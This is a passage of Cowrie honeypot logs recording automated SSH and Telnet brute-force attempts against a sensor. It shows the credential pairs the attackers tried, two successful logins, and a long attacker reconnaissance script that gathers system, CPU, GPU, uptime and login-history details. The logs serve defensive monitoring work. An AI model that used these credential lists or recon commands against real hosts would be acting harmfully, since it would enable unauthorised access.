.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:52:58.149907Z","src_ip":"83.168.105.65","session":"163696700f65"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:58.213691Z","src_ip":"212.227.125.160","session":"9c5db9c8a21d"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q@W3e4r","message":"login attempt [root/!Q@W3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:52:58.262451Z","src_ip":"83.168.105.65","session":"163696700f65"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:52:58.398599Z","src_ip":"83.168.105.65","session":"163696700f65"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:52:58.399347Z","src_ip":"83.168.105.65","session":"163696700f65"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:58.437602Z","src_ip":"83.168.105.65","session":"163696700f65"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:58.438713Z","src_ip":"83.168.105.65","session":"163696700f65"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:59.466010Z","src_ip":"196.251.86.249","session":"241c7594f1e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51294,"dst_ip":"1.2.3.4","dst_port":23,"session":"ba6a7d24e84b","protocol":"telnet","message":"New connection: 212.227.125.160:51294 (1.2.3.4:23) [session: ba6a7d24e84b]","sensor":"my-vps","timestamp":"2025-08-26T11:52:59.667769Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40566,"dst_ip":"1.2.3.4","dst_port":22,"session":"691c8bad2637","protocol":"ssh","message":"New connection: 212.227.125.160:40566 (1.2.3.4:22) [session: 691c8bad2637]","sensor":"my-vps","timestamp":"2025-08-26T11:53:02.416080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:02.416787Z","src_ip":"212.227.125.160","session":"691c8bad2637"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:53:02.480378Z","src_ip":"212.227.125.160","session":"691c8bad2637"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"nagios","message":"login attempt [nagios/nagios] failed","sensor":"my-vps","timestamp":"2025-08-26T11:53:02.657393Z","src_ip":"212.227.125.160","session":"691c8bad2637"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:03.845798Z","src_ip":"212.227.125.160","session":"691c8bad2637"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41334,"dst_ip":"1.2.3.4","dst_port":22,"session":"d82d03046c47","protocol":"ssh","message":"New connection: 212.227.125.160:41334 (1.2.3.4:22) [session: d82d03046c47]","sensor":"my-vps","timestamp":"2025-08-26T11:53:07.658243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:07.665445Z","src_ip":"212.227.125.160","session":"d82d03046c47"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:53:07.732676Z","src_ip":"212.227.125.160","session":"d82d03046c47"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:53:08.009619Z","src_ip":"212.227.125.160","session":"d82d03046c47"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:09.067209Z","src_ip":"212.227.125.160","session":"d82d03046c47"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":57970,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c12e30d3ae6","protocol":"ssh","message":"New connection: 83.168.105.65:57970 (1.2.3.4:22) [session: 6c12e30d3ae6]","sensor":"my-vps","timestamp":"2025-08-26T11:53:13.086996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:13.087629Z","src_ip":"83.168.105.65","session":"6c12e30d3ae6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:53:13.123748Z","src_ip":"83.168.105.65","session":"6c12e30d3ae6"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos","message":"login attempt [centos/centos] failed","sensor":"my-vps","timestamp":"2025-08-26T11:53:13.232172Z","src_ip":"83.168.105.65","session":"6c12e30d3ae6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42106,"dst_ip":"1.2.3.4","dst_port":22,"session":"92e8b0746c31","protocol":"ssh","message":"New connection: 212.227.125.160:42106 (1.2.3.4:22) [session: 92e8b0746c31]","sensor":"my-vps","timestamp":"2025-08-26T11:53:13.649108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:13.650009Z","src_ip":"212.227.125.160","session":"92e8b0746c31"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:53:13.701080Z","src_ip":"212.227.125.160","session":"92e8b0746c31"}
{"eventid":"cowrie.login.failed","username":"klepetko","password":"klepetko","message":"login attempt [klepetko/klepetko] failed","sensor":"my-vps","timestamp":"2025-08-26T11:53:13.856561Z","src_ip":"212.227.125.160","session":"92e8b0746c31"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:14.269361Z","src_ip":"83.168.105.65","session":"6c12e30d3ae6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:14.977788Z","src_ip":"212.227.125.160","session":"92e8b0746c31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41764,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe0317c2c877","protocol":"ssh","message":"New connection: 212.227.235.229:41764 (1.2.3.4:22) [session: fe0317c2c877]","sensor":"my-vps","timestamp":"2025-08-26T11:53:18.107975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:18.290305Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:53:18.291022Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42882,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c596f304c83","protocol":"ssh","message":"New connection: 212.227.125.160:42882 (1.2.3.4:22) [session: 2c596f304c83]","sensor":"my-vps","timestamp":"2025-08-26T11:53:19.669659Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:19.670548Z","src_ip":"212.227.125.160","session":"2c596f304c83"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:53:19.722444Z","src_ip":"212.227.125.160","session":"2c596f304c83"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:53:19.737462Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:53:20.034173Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T11:53:20.034791Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:53:20.035744Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:53:20.037161Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T11:53:20.038857Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:53:20.039889Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:53:20.040623Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T11:53:20.041577Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T11:53:20.042160Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:53:20.043004Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:53:20.043718Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:53:20.044498Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:53:20.045240Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest123","message":"login attempt [guest/guest123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:53:20.174040Z","src_ip":"212.227.125.160","session":"2c596f304c83"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T11:53:20.228468Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:20.229344Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:20.230438Z","src_ip":"212.227.235.229","session":"fe0317c2c877"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:21.229177Z","src_ip":"212.227.125.160","session":"2c596f304c83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43654,"dst_ip":"1.2.3.4","dst_port":22,"session":"a09542743938","protocol":"ssh","message":"New connection: 212.227.125.160:43654 (1.2.3.4:22) [session: a09542743938]","sensor":"my-vps","timestamp":"2025-08-26T11:53:25.169836Z"}
